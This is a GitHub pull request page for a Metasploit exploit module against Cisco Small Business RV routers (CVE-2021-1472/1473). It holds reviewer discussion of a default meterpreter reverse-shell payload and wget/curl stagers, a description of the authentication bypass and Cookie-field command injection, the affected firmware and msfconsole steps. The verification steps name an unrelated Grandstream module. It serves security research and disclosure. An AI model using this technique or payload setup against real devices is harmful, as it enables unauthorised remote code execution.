-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Cisco RV Series Unauth RCE (CVE-2021-1472/CVE-2021-1473) #16128
Conversation
}, | ||
'CmdStagerFlavor' => [ 'wget', 'curl' ], | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I've received review feedback a couple of times to not include this since it's the default value. However, when switching between targets (this module has two), if the default is not set then it needs to be manually entered. For example, if I start off with target 0 ('Unix Command') and switch to 'Linux Dropper' with no default set then the payload will be 'cmd/unix/reverse_netcat', which is obviously not a compatible payload.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This is correct. You can and should set a payload
for each target
.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Code looks good to me. Just left a suggestion regarding the module name in the verification steps in the docs.
documentation/modules/exploit/linux/http/cisco_rv_series_authbypass_and_rce.md
Outdated
Show resolved
Hide resolved
…ypass_and_rce.md Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Got it. Thanks! |
Release NotesThis adds an exploit for various Cisco RV series VPNs / Routers for firmware versions |
This module exploits an authentication bypass (CVE-2021-1472) and command injection (CVE-2021-1473) in the Cisco Small Business RV series of VPN/routers. The device does not adequately verify the credentials in the HTTP Authorization field when requests are made to the /upload endpoint. Then the upload.cgi binary will use the contents of the HTTP Cookie field as part of a
curl
request aimed at an internal endpoint. The curl request is executed usingpopen
and allows the attackerto inject commands via the Cookie field. IoT Inspector has a nice write up describing the issues.
A remote and unauthenticated attacker using this module is able to achieve code execution as
www-data
. This module affects the RV340, RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and below.The one quirky thing about this module is that I experienced stability issues with the armle reverse stager (see #16107). I'm quite confident the module is not to blame (since I recreated without the module). However, since the Meterpreter payload doesn't land 100% of the time, I set the default to a standard unix reverse shell payload.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
set RHOST <ip>
check
set LHOST <ip>
exploit
PCAP || GTFO
cisco_rv_rce.zip
Video || GTFO
https://www.youtube.com/watch?v=fqre3sbViXI